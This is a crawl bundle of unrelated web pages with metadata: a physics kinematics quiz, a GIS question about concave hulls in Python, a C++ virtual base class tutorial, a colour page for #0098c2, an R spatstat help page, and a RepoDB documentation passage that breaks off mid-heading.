{"ft_lang_label":"__label__en","ft_lang_prob":0.80356205,"math_prob":0.9808091,"size":4902,"snap":"2022-40-2023-06","text_gpt3_token_len":1391,"char_repetition_ratio":0.104736626,"word_repetition_ratio":0.17177914,"special_character_ratio":0.34251326,"punctuation_ratio":0.16301239,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98463374,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-31T19:32:13Z\",\"WARC-Record-ID\":\"<urn:uuid:7f47547b-c1b6-4779-9920-4e36fbd6bbba>\",\"Content-Length\":\"32781\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:578c92c8-7217-48ef-b51c-909f26d8441a>\",\"WARC-Concurrent-To\":\"<urn:uuid:5edf0853-eae4-4d6b-8997-173e70b1659f>\",\"WARC-IP-Address\":\"198.137.202.140\",\"WARC-Target-URI\":\"https://forum.nasm.us/index.php?topic=2861.0;prev_next=prev\",\"WARC-Payload-Digest\":\"sha1:6IRN63DUTIAOTRSYWKEF6I7MY757VSET\",\"WARC-Block-Digest\":\"sha1:YL3FWRAPGG6H7IXAG3QLFNXL6DNOZ6H2\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499890.39_warc_CC-MAIN-20230131190543-20230131220543-00315.warc.gz\"}"}
https://www.goquizer.com/physics-mcqs-for-test-preparation/5/
[ "# Physics Mcqs For Test Preparation Of All Competitive Exam With Answers", null, "Each of four particles move along an x axis. Their coordinates (in meters) as functions of time\n(in seconds) are given by\n\nparticle 1: x(t) = 3.5 − 2.7t3\nparticle 2: x(t) = 3.5 +2.7t3\nparticle 3: x(t) = 3.5 +2.7t2\nparticle 4: x(t) = 3.5 − 3.4t − 2.7t2\n\nWhich of these particles have constant acceleration?\nA. All four\n\nB. Only 1 and 2\nC. Only 2 and 3\nD. Only 3 and 4\nE. None of them\n\nEach of four particles move along an x axis. Their coordinates (in meters) as functions of time\n(in seconds) are given by\n\nparticle 1: x(t) = 3.5 − 2.7t3\nparticle 2: x(t) = 3.5 +2.7t3\nparticle 3: x(t) = 3.5 +2.7t2\nparticle 4: x(t) = 3.5 − 3.4t − 2.7t2\n\nWhich of these particles is speeding up for t > 0?\nA. All four\nB. Only 1\nC. Only 2 and 3\nD. Only 2, 3, and 4\nE. None of them\n\nAn object starts from rest at the origin and moves along the x axis with a constant acceleration\nof 4m/s2. Its average velocity as it goes from x = 2m to x = 8m is:\n\nA. 1m/s\nB. 2m/s\nC. 3m/s\nD. 5m/s\nE. 6m/s\n\nOf the following situations, which one is impossible?\nA. A body having velocity east and acceleration east\nB. A body having velocity east and acceleration west\nC. A body having zero velocity and non-zero acceleration\nD. A body having constant acceleration and variable velocity\nE. A body having constant velocity and variable acceleration\n\nThroughout a time interval, while the speed of a particle increases as it moves along the x axis,\nits velocity and acceleration might be:\n\nA. positive and negative, respectively\nB. negative and positive, respectively\nC. negative and negative, respectively\nD. negative and zero, respectively\nE. positive and zero, respectively\n\nA particle moves on the x axis. When its acceleration is positive and increasing:\nA. its velocity must be positive\nB. its velocity must be negative\nC. it must be slowing down\nD. it must be speeding up\nE. none of the above must be true\n\nThe position y of a particle moving along the y axis depends on the time t according to the\nequation y = at − bt2. The dimensions of the quantities a and b are respectively:\n\nA. L2/T, L3/T2\nB. L/T2, L2/T\nC. L/T, L/T2\nD. L3/T, T2/L\nE. none of these" ]
[ null, "https://www.goquizer.com/wp-content/uploads/2020/11/physics-mcqs.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8795318,"math_prob":0.990433,"size":2124,"snap":"2022-27-2022-33","text_gpt3_token_len":683,"char_repetition_ratio":0.15330188,"word_repetition_ratio":0.2970297,"special_character_ratio":0.30084747,"punctuation_ratio":0.16827853,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99894255,"pos_list":[0,1,2],"im_url_duplicate_count":[null,6,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-28T22:07:55Z\",\"WARC-Record-ID\":\"<urn:uuid:34037569-4f44-4884-88d9-3bee4b330436>\",\"Content-Length\":\"943638\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:47d38c31-bbe8-4b02-a2a6-a75a551dd570>\",\"WARC-Concurrent-To\":\"<urn:uuid:027a409f-7f5b-400d-88b3-502bd2a598f9>\",\"WARC-IP-Address\":\"172.67.200.146\",\"WARC-Target-URI\":\"https://www.goquizer.com/physics-mcqs-for-test-preparation/5/\",\"WARC-Payload-Digest\":\"sha1:IJ2CG3TG6LAYCUEWW2JAKMS3SWJKAHZF\",\"WARC-Block-Digest\":\"sha1:4OYUKLDFDZES3SXXEXF3N2JSXV5GZV4T\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103617931.31_warc_CC-MAIN-20220628203615-20220628233615-00741.warc.gz\"}"}
https://gis.stackexchange.com/questions/268889/creating-concave-hull-with-python
[ "# Creating concave hull with Python?\n\nI'm trying to follow this tutoriel to do a concave hull script : Drawing Boundaries In Python\n\nOf course, I drop all steps for plot results. But at the and of my script I have an error. This is last lines :\n\n``````edges = set()\nedge_points = []\n\n# loop over triangles:\n# ia, ib, ic = indices of corner points of the triangle\n\nfor ia, ib, ic in tri.vertices:\npa = coords[ia]\npb = coords[ib]\npc = coords[ic]\n# Lengths of sides of triangle\na = math.sqrt((pa-pb)**2 + (pa-pb)**2)\nb = math.sqrt((pb-pc)**2 + (pb-pc)**2)\nc = math.sqrt((pc-pa)**2 + (pc-pa)**2)\n# Semiperimeter of triangle\ns = (a + b + c)/2.0\n# Area of triangle by Heron's formula\narea = math.sqrt(s*(s-a)*(s-b)*(s-c))\ncircum_r = a*b*c/(4.0*area)\n#print circum_r\nif circum_r < 1.0/alpha:\n\nm = geometry.MultiLineString(edge_points)\ntriangles = list(polygonize(m))\n``````\n\nAnd it returns :\n\n``````Assertion failed: (!static_cast<bool>(\"should never be reached\")),\nfunction itemsTree, file AbstractSTRtree.cpp, line 373.\nAbort trap: 6\n``````\n\nWhat is wrong here?\n\n• Which line exactly triggers that? Do you use a spatial index? – bugmenot123 Jan 23 '18 at 10:12\n• The last line is generating this error and more precisely, cascaded_union() fonction... For spatial index, I don't think so. – Tim C. Jan 23 '18 at 10:20\n• Seems like a bug! Please see github.com/Toblerity/Shapely/… and try if updating accordingly fixes it. If not, please try to make a bug report with the data that leads to this. :) If this fixes it, please post that as your own answer to this question. – bugmenot123 Jan 23 '18 at 10:44" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6884411,"math_prob":0.9512115,"size":1229,"snap":"2019-51-2020-05","text_gpt3_token_len":383,"char_repetition_ratio":0.12816326,"word_repetition_ratio":0.0,"special_character_ratio":0.33685923,"punctuation_ratio":0.17374517,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.993086,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-18T11:34:43Z\",\"WARC-Record-ID\":\"<urn:uuid:42d6252c-41f2-4f54-b7ee-70b6328f8e28>\",\"Content-Length\":\"135026\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:862cdee0-c763-449f-bc94-9d2d1df6da2b>\",\"WARC-Concurrent-To\":\"<urn:uuid:358f644f-b789-469c-9fcd-608d3066daeb>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://gis.stackexchange.com/questions/268889/creating-concave-hull-with-python\",\"WARC-Payload-Digest\":\"sha1:C3FX7OJXFSIEWK2Y4XU46KBSPYM5U3GK\",\"WARC-Block-Digest\":\"sha1:LKRAL3F4PH7456JLYH7AWXH4GFHW7XPU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250592565.2_warc_CC-MAIN-20200118110141-20200118134141-00043.warc.gz\"}"}
https://www.tutorialandexample.com/virtual-base-class-in-cpp
[ "# Virtual base class in C++\n\nConsider in a C++ program, there are 4 classes named class A, class B, class C, and class D. If class B and class c inherit properties from class A. Then class D will inherit properties from class B and class C. An error will occur when we run the code because class D will have twice the properties of class A. In such a situation, we can use the keyword Virtual.\n\n### What is Virtual Class?\n\nA Virtual Class is a keyword used in the derived Class. This keyword ensures that only one copy of the parent class is in the derived Class. This virtual Class helps to reduce the error caused in the above example. Specifying a class as a virtual base class prevents duplication of its data members. This allows all base classes that utilize the virtual base class to share only one copy of all the data members.\n\nExample: Error when Class is inherited twice\n\n``````#include <iostream>\nusing namespace std;\n\nclass A {\npublic:\nA() {\ncout << \"Constructor A\\n\";\n}\nvoid display() {\ncout << \"Hello form Class A \\n\";\n}\n};\n\nclass B: public A {\n};\n\nclass C: public A {\n};\n\nclass D: public B, public C {\n};\n\nint main() {\nD object;\nobject.display();\n}``````\n\nOutput:\n\n``````Request for member 'display' is ambiguous\nobject.display();\n``````\n\nExplanation:\n\nIn the above code, we have considered 4 classes, class A, class B, Class C, and Class D. If the class B and class c inherit properties from class A. Then class D will inherit properties from class B and class C. When we run the code, the error occurs because class D will have twice the properties of class A.\n\nThe syntax for declaring virtual base:\n\n``````class B: virtual public A {\n// statement 1\n};\nclass C: public virtual A {\n// statement 2\n};\n``````\n\nExample:\n\n``````#include <iostream>\nusing namespace std;\n\nclass A {\npublic:\nA() // Constructor\n{\ncout << \"Hi from Constructor A\\n\";\n}\n};\n//Class is inherited using the virtual keyword\nclass B: public virtual A {\n};\n//Class is inherited using the virtual keyword\n\nclass C: public virtual A {\n};\n\nclass D: public B, public C {\n};\n\nint main() {\nD object; // Object creation of class D.\n\nreturn 0;\n}\n``````\n\nOutput:", null, "Explanation:\n\nIn the above example, we created 4 classes, the same as the last example, and we also inherited the classes similar to the last example. But here, we used the virtual keyword, which has created a single copy of class A in Class D. Due to this, no error is generated.\n\nExample:\n\n``````#include <iostream>\nusing namespace std;\nclass A {\npublic:\nint a;\nA(){\na = 10;\n}\n};\nclass B : public virtual A {\n};\nclass C : public virtual A {\n};\nclass D : public B, public C {\n};\nint main(){\n//creating class D object\nD object;\ncout << \"a = \" << object.a << endl;\nreturn 0;\n}\n``````\n\nOutput:", null, "Explanation:\n\nIn the above example, we have created four classes A, B, C, and D. Using the virtual keyword, we have inherited the properties of A into B and C. Then we have inherited the B and C properties into D here as we have used the virtual keyword so no duplicate class will be created into D, and no error will have occurred.\n\n1. To ensure that all base classes are created before their derived classes, virtual base classes are always created before non-virtual base classes.\n2. Objects of classes B and C still have calls to class A, but they are ignored when creating objects of Class D. Objects of classes B and C class have the constructor of class A\n\nPure Virtual Function: A normal virtual function describes the base class with nothing known as a pure virtual function.\n\nExample:\n\n``````#include <iostream>\nusing namespace std;\n\nclass Animal {\npublic:\n// Pure Virtual Function is created inside the parent class\nvirtual void move() = 0;\n};\n\nclass Lion: public Animal {\npublic:\nvoid move() {\ncout << \"Hi from the Lion class\" << endl;\n}\n};\n\nclass Wolf: public Animal {\npublic:\nvoid move() {\ncout << \"Hi from the wolf class\" << endl;\n}\n};\n\nint main() {\nLion l;\nWolf w;\n\nl.move();\nw.move();\n} ``````\n\nOutput:", null, "Explanation:\n\nWe have inherited the base class properties into the other two classes. In the above example, we have created a parent class, Animal, in this Class we have defined Virtual function which is know as pure virtual. In the above Class, we have defined a pure virtual class, so we need to define the function in the derived classes." ]
[ null, "https://static.tutorialandexample.com/cpp/virtual-base-class-in-cpp1.png", null, "https://static.tutorialandexample.com/cpp/virtual-base-class-in-cpp2.png", null, "https://static.tutorialandexample.com/cpp/virtual-base-class-in-cpp3.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79988587,"math_prob":0.53061014,"size":4166,"snap":"2023-40-2023-50","text_gpt3_token_len":962,"char_repetition_ratio":0.1881307,"word_repetition_ratio":0.21336761,"special_character_ratio":0.26164186,"punctuation_ratio":0.16393442,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95570666,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-24T20:49:12Z\",\"WARC-Record-ID\":\"<urn:uuid:0d7b4229-376d-4a2b-b357-e1dc416b25f1>\",\"Content-Length\":\"124844\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d1930921-4249-4a13-9140-9d4ae27aa65d>\",\"WARC-Concurrent-To\":\"<urn:uuid:4ee47308-9d9d-4dac-885b-969c4cbe778d>\",\"WARC-IP-Address\":\"104.21.11.62\",\"WARC-Target-URI\":\"https://www.tutorialandexample.com/virtual-base-class-in-cpp\",\"WARC-Payload-Digest\":\"sha1:6CRKKMLZGYL64P7JUBVWEGPJV2AM7IGD\",\"WARC-Block-Digest\":\"sha1:XJAFEFPVD5PYG5GM4AU7BCET6GEJDAVJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506669.30_warc_CC-MAIN-20230924191454-20230924221454-00622.warc.gz\"}"}
http://xqqxqjp.nation2.com/standard-form-y-intercept
[ "Total Visits: 4256\nStandard form y-intercept\nStandard form y-intercept\n\nStandard form y-intercept\n\nInformation:\nRating: 415 out of 1045\nFiles in category: 265\n\nYou Are Viewing an Explanation For: Finding the x- and y-intercepts from an equation in standard form. See Prentice Hall's Mathematics Offerings at:\n\nTags: standard y-intercept form\n\nLatest Search Queries:\n\nbioterrorism evidence document\n\ntravel document holder leather\n\nIn order to find the slope, it is simplest to put this line equation into slope-intercept form. If I rearrange this line to be in the form \"y = mx + b\", it will be easy to read Fun math practice! Improve your skills with free problems in 'Standard form: find x- and y-intercepts' and thousands of other practice lessons. Convert linear equations between slope-intercept and standard forms. 9 x ? 2 y = 4 0 qquad 9x-2y=40 9x?2y=40. y = qquad y= y= Answer. You are viewing a\n\nnew york state snowmobile registration form\n\nThere is the slope intercept form , point slope form and also this page's topic. When you want to graph the line; When you want to know the y-intercept of the Note: To find the x-intercept of a given linear equation, simply remove the 'y' and solve for 'x'. To find the y-intercept, remove the 'x' and solve for 'y'. A linear equation in standard form is an equation that looks like find the x-intercept, let y = 0, since the x intercept will be at a point of the form (something, 0). to Standard Form. How to convert from y = mx + b to Ax + By = C Convert the the equation below from slope intercept form to standard form. Show Answer. Find the x and y intercept given an equation in standard form.\n\nspanish legal wills form\nWs65908 mitsubishi service manual specifications repair, Find command in unix example, Consumer report transfer on credit card, Usmc request mast form, Eurochron manual." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84678805,"math_prob":0.96628433,"size":1950,"snap":"2019-26-2019-30","text_gpt3_token_len":483,"char_repetition_ratio":0.19167523,"word_repetition_ratio":0.018348623,"special_character_ratio":0.23794872,"punctuation_ratio":0.118863046,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9892709,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-18T10:56:54Z\",\"WARC-Record-ID\":\"<urn:uuid:65a5a761-4d6f-4741-a265-eb7519e06b52>\",\"Content-Length\":\"21045\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3f79cff9-743a-4338-ae17-682c0cf0fdbf>\",\"WARC-Concurrent-To\":\"<urn:uuid:17969d9b-8245-481d-ac30-800c769a86a0>\",\"WARC-IP-Address\":\"188.93.231.122\",\"WARC-Target-URI\":\"http://xqqxqjp.nation2.com/standard-form-y-intercept\",\"WARC-Payload-Digest\":\"sha1:OP33REPMGKF5SZPNU5YFHP4IUOZ3SVIS\",\"WARC-Block-Digest\":\"sha1:TUHURDVCFCQYA4PSDVQSNWHVJXBTZRT7\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627998716.67_warc_CC-MAIN-20190618103358-20190618125358-00220.warc.gz\"}"}
https://www.colorhexa.com/0098c2
[ "# #0098c2 Color Information\n\nIn a RGB color space, hex #0098c2 is composed of 0% red, 59.6% green and 76.1% blue. Whereas in a CMYK color space, it is composed of 100% cyan, 21.6% magenta, 0% yellow and 23.9% black. It has a hue angle of 193 degrees, a saturation of 100% and a lightness of 38%. #0098c2 color hex could be obtained by blending #00ffff with #003185. Closest websafe color is: #0099cc.\n\n• R 0\n• G 60\n• B 76\nRGB color chart\n• C 100\n• M 22\n• Y 0\n• K 24\nCMYK color chart\n\n#0098c2 color description : Strong cyan.\n\n# #0098c2 Color Conversion\n\nThe hexadecimal color #0098c2 has RGB values of R:0, G:152, B:194 and CMYK values of C:1, M:0.22, Y:0, K:0.24. Its decimal value is 39106.\n\nHex triplet RGB Decimal 0098c2 `#0098c2` 0, 152, 194 `rgb(0,152,194)` 0, 59.6, 76.1 `rgb(0%,59.6%,76.1%)` 100, 22, 0, 24 193°, 100, 38 `hsl(193,100%,38%)` 193°, 100, 76.1 0099cc `#0099cc`\nCIE-LAB 58.367, -18.454, -31.078 20.963, 26.349, 55.017 0.205, 0.257, 26.349 58.367, 36.144, 239.299 58.367, -40.654, -45.791 51.332, -16.933, -27.615 00000000, 10011000, 11000010\n\n# Color Schemes with #0098c2\n\n• #0098c2\n``#0098c2` `rgb(0,152,194)``\n• #c22a00\n``#c22a00` `rgb(194,42,0)``\nComplementary Color\n• #00c28b\n``#00c28b` `rgb(0,194,139)``\n• #0098c2\n``#0098c2` `rgb(0,152,194)``\n• #0037c2\n``#0037c2` `rgb(0,55,194)``\nAnalogous Color\n• #c28b00\n``#c28b00` `rgb(194,139,0)``\n• #0098c2\n``#0098c2` `rgb(0,152,194)``\n• #c20037\n``#c20037` `rgb(194,0,55)``\nSplit Complementary Color\n• #98c200\n``#98c200` `rgb(152,194,0)``\n• #0098c2\n``#0098c2` `rgb(0,152,194)``\n• #c20098\n``#c20098` `rgb(194,0,152)``\nTriadic Color\n• #00c22a\n``#00c22a` `rgb(0,194,42)``\n• #0098c2\n``#0098c2` `rgb(0,152,194)``\n• #c20098\n``#c20098` `rgb(194,0,152)``\n• #c22a00\n``#c22a00` `rgb(194,42,0)``\nTetradic Color\n• #005c76\n``#005c76` `rgb(0,92,118)``\n• #00708f\n``#00708f` `rgb(0,112,143)``\n• #0084a9\n``#0084a9` `rgb(0,132,169)``\n• #0098c2\n``#0098c2` `rgb(0,152,194)``\n• #00acdc\n``#00acdc` `rgb(0,172,220)``\n• #00c0f5\n``#00c0f5` `rgb(0,192,245)``\n• #10cbff\n``#10cbff` `rgb(16,203,255)``\nMonochromatic Color\n\n# Alternatives to #0098c2\n\nBelow, you can see some colors close to #0098c2. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #00c2bc\n``#00c2bc` `rgb(0,194,188)``\n• #00b8c2\n``#00b8c2` `rgb(0,184,194)``\n• #00a8c2\n``#00a8c2` `rgb(0,168,194)``\n• #0098c2\n``#0098c2` `rgb(0,152,194)``\n• #0088c2\n``#0088c2` `rgb(0,136,194)``\n• #0078c2\n``#0078c2` `rgb(0,120,194)``\n• #0068c2\n``#0068c2` `rgb(0,104,194)``\nSimilar Colors\n\n# #0098c2 Preview\n\nText with hexadecimal color #0098c2\n\nThis text has a font color of #0098c2.\n\n``<span style=\"color:#0098c2;\">Text here</span>``\n#0098c2 background color\n\nThis paragraph has a background color of #0098c2.\n\n``<p style=\"background-color:#0098c2;\">Content here</p>``\n#0098c2 border color\n\nThis element has a border color of #0098c2.\n\n``<div style=\"border:1px solid #0098c2;\">Content here</div>``\nCSS codes\n``.text {color:#0098c2;}``\n``.background {background-color:#0098c2;}``\n``.border {border:1px solid #0098c2;}``\n\n# Shades and Tints of #0098c2\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #000e11 is the darkest color, while #fdffff is the lightest one.\n\n• #000e11\n``#000e11` `rgb(0,14,17)``\n• #001d25\n``#001d25` `rgb(0,29,37)``\n• #002c39\n``#002c39` `rgb(0,44,57)``\n• #003c4c\n``#003c4c` `rgb(0,60,76)``\n• #004b60\n``#004b60` `rgb(0,75,96)``\n• #005b74\n``#005b74` `rgb(0,91,116)``\n• #006a87\n``#006a87` `rgb(0,106,135)``\n• #00799b\n``#00799b` `rgb(0,121,155)``\n• #0089ae\n``#0089ae` `rgb(0,137,174)``\n• #0098c2\n``#0098c2` `rgb(0,152,194)``\n• #00a7d6\n``#00a7d6` `rgb(0,167,214)``\n• #00b7e9\n``#00b7e9` `rgb(0,183,233)``\n• #00c6fd\n``#00c6fd` `rgb(0,198,253)``\nShade Color Variation\n• #11ccff\n``#11ccff` `rgb(17,204,255)``\n• #25d0ff\n``#25d0ff` `rgb(37,208,255)``\n• #39d4ff\n``#39d4ff` `rgb(57,212,255)``\n• #4cd8ff\n``#4cd8ff` `rgb(76,216,255)``\n• #60ddff\n``#60ddff` `rgb(96,221,255)``\n• #74e1ff\n``#74e1ff` `rgb(116,225,255)``\n• #87e5ff\n``#87e5ff` `rgb(135,229,255)``\n• #9be9ff\n``#9be9ff` `rgb(155,233,255)``\n• #aeeeff\n``#aeeeff` `rgb(174,238,255)``\n• #c2f2ff\n``#c2f2ff` `rgb(194,242,255)``\n• #d6f6ff\n``#d6f6ff` `rgb(214,246,255)``\n• #e9faff\n``#e9faff` `rgb(233,250,255)``\n• #fdffff\n``#fdffff` `rgb(253,255,255)``\nTint Color Variation\n\n# Tones of #0098c2\n\nA tone is produced by adding gray to any pure hue. In this case, #5a6568 is the less saturated color, while #0098c2 is the most saturated one.\n\n• #5a6568\n``#5a6568` `rgb(90,101,104)``\n• #526970\n``#526970` `rgb(82,105,112)``\n• #4b6e77\n``#4b6e77` `rgb(75,110,119)``\n• #43727f\n``#43727f` `rgb(67,114,127)``\n• #3c7686\n``#3c7686` `rgb(60,118,134)``\n• #347a8e\n``#347a8e` `rgb(52,122,142)``\n• #2d7f95\n``#2d7f95` `rgb(45,127,149)``\n• #25839d\n``#25839d` `rgb(37,131,157)``\n• #1e87a4\n``#1e87a4` `rgb(30,135,164)``\n• #168bac\n``#168bac` `rgb(22,139,172)``\n• #0f90b3\n``#0f90b3` `rgb(15,144,179)``\n• #0794bb\n``#0794bb` `rgb(7,148,187)``\n• #0098c2\n``#0098c2` `rgb(0,152,194)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #0098c2 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5309098,"math_prob":0.7982364,"size":3673,"snap":"2021-21-2021-25","text_gpt3_token_len":1636,"char_repetition_ratio":0.14772418,"word_repetition_ratio":0.011111111,"special_character_ratio":0.55703783,"punctuation_ratio":0.22847302,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98386043,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-22T19:27:45Z\",\"WARC-Record-ID\":\"<urn:uuid:229f8830-9aff-49e4-bd83-b136937d27c4>\",\"Content-Length\":\"36245\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:625a8211-7bb4-4b91-9490-251694d77ee3>\",\"WARC-Concurrent-To\":\"<urn:uuid:e0649d04-318c-4b35-b6fd-358147f7cae1>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/0098c2\",\"WARC-Payload-Digest\":\"sha1:D5TJUS7PRDWUP46XYEPCSCXYUWDMG44E\",\"WARC-Block-Digest\":\"sha1:HW7GHYU5WCSVRSYHPJT7D32MDLUBYBYJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623488519735.70_warc_CC-MAIN-20210622190124-20210622220124-00552.warc.gz\"}"}
https://www.rdocumentation.org/packages/spatstat/versions/1.61-0/topics/pixelquad
[ "0th\n\nPercentile\n\n##### Quadrature Scheme Based on Pixel Grid\n\nMakes a quadrature scheme with a dummy point at every pixel of a pixel image.\n\nKeywords\nspatial, datagen\n##### Usage\npixelquad(X, W = as.owin(X))\n##### Arguments\nX\n\nPoint pattern (object of class \"ppp\") containing the data points for the quadrature scheme.\n\nW\n\nSpecifies the pixel grid. A pixel image (object of class \"im\"), a window (object of class \"owin\"), or anything that can be converted to a window by as.owin.\n\n##### Details\n\nThis is a method for producing a quadrature scheme for use by ppm. It is an alternative to quadscheme.\n\nThe function ppm fits a point process model to an observed point pattern using the Berman-Turner quadrature approximation (Berman and Turner, 1992; Baddeley and Turner, 2000) to the pseudolikelihood of the model. It requires a quadrature scheme consisting of the original data point pattern, an additional pattern of dummy points, and a vector of quadrature weights for all these points. Such quadrature schemes are represented by objects of class \"quad\". See quad.object for a description of this class.\n\nGiven a grid of pixels, this function creates a quadrature scheme in which there is one dummy point at the centre of each pixel. The counting weights are used (the weight attached to each quadrature point is 1 divided by the number of quadrature points falling in the same pixel).\n\nThe argument X specifies the locations of the data points for the quadrature scheme. Typically this would be a point pattern dataset.\n\nThe argument W specifies the grid of pixels for the dummy points of the quadrature scheme. It should be a pixel image (object of class \"im\"), a window (object of class \"owin\"), or anything that can be converted to a window by as.owin. If W is a pixel image or a binary mask (a window of type \"mask\") then the pixel grid of W will be used. If W is a rectangular or polygonal window, then it will first be converted to a binary mask using as.mask at the default pixel resolution.\n\n##### Value\n\nAn object of class \"quad\" describing the quadrature scheme (data points, dummy points, and quadrature weights) suitable as the argument Q of the function ppm() for fitting a point process model.\n\nThe quadrature scheme can be inspected using the print and plot methods for objects of class \"quad\".\n\nquadscheme, quad.object, ppm\n\n##### Aliases\n# NOT RUN {" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74583155,"math_prob":0.9492662,"size":2369,"snap":"2020-24-2020-29","text_gpt3_token_len":605,"char_repetition_ratio":0.17167018,"word_repetition_ratio":0.083129585,"special_character_ratio":0.23005487,"punctuation_ratio":0.09978308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9894387,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-25T23:21:27Z\",\"WARC-Record-ID\":\"<urn:uuid:aebd4b82-34a7-427c-945f-aa7d1314119d>\",\"Content-Length\":\"17434\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5aef538b-1105-454b-abfd-dc01144aed77>\",\"WARC-Concurrent-To\":\"<urn:uuid:36a1d455-a8cd-4aa9-9486-828f4c931cb2>\",\"WARC-IP-Address\":\"34.195.39.161\",\"WARC-Target-URI\":\"https://www.rdocumentation.org/packages/spatstat/versions/1.61-0/topics/pixelquad\",\"WARC-Payload-Digest\":\"sha1:22UIWSLPMUKSCXFEG7UXKMOYSSHUSYFF\",\"WARC-Block-Digest\":\"sha1:B7MQMNXGUS6C56LYTJWHO5GYOFWVJVE5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347390437.8_warc_CC-MAIN-20200525223929-20200526013929-00581.warc.gz\"}"}
https://repodb.net/operation/executequerymultiple
[ "# ExecuteQueryMultiple\n\nThis method is used to execute multiple raw-SQL Statements directly towards the database (in one-go). It returns an object of QueryMultipleExtractor. This method supports all types of RDMBS data providers.\n\n## Code Snippets\n\nBelow is a code that queries a parent person row from the `[dbo].[Person]` table and all its related historical addresses from the `[dbo].[Address]` table.\n\n``````using (var connection = new SqlConnection(connectionString))\n{\nusing (var result = connection.ExecuteQueryMultiple(\"SELECT * FROM [dbo].[Person] WHERE [Id] = 10045; SELECT * FROM [dbo].[Address] WHERE PersonId = 10045;\"))\n{\nvar person = result.Extract<Person>().FirstOrDefault();\n}\n}\n``````\n\nYou can also get a single value by calling the `Scalar()` method.\n\n``````using (var connection = new SqlConnection(connectionString))\n{\nusing (var result = connection.ExecuteQueryMultiple(\"SELECT * FROM [dbo].[Person] WHERE [Id] = 10045; SELECT COUNT(*) AS AddressCount FROM [dbo].[Address] WHERE PersonId = 10045;\"))\n{\nvar person = result.Extract<Person>().FirstOrDefault();\n}\n}\n``````\n\nThe calls to the `Extract()` and `Scalar()` methods varry on the order of the calls you have made at the QueryMultipleExtractor object. Underneath, it is uses the `DbDataReader.NextResult()` method to extract the rows in order.\n\n## Passing of 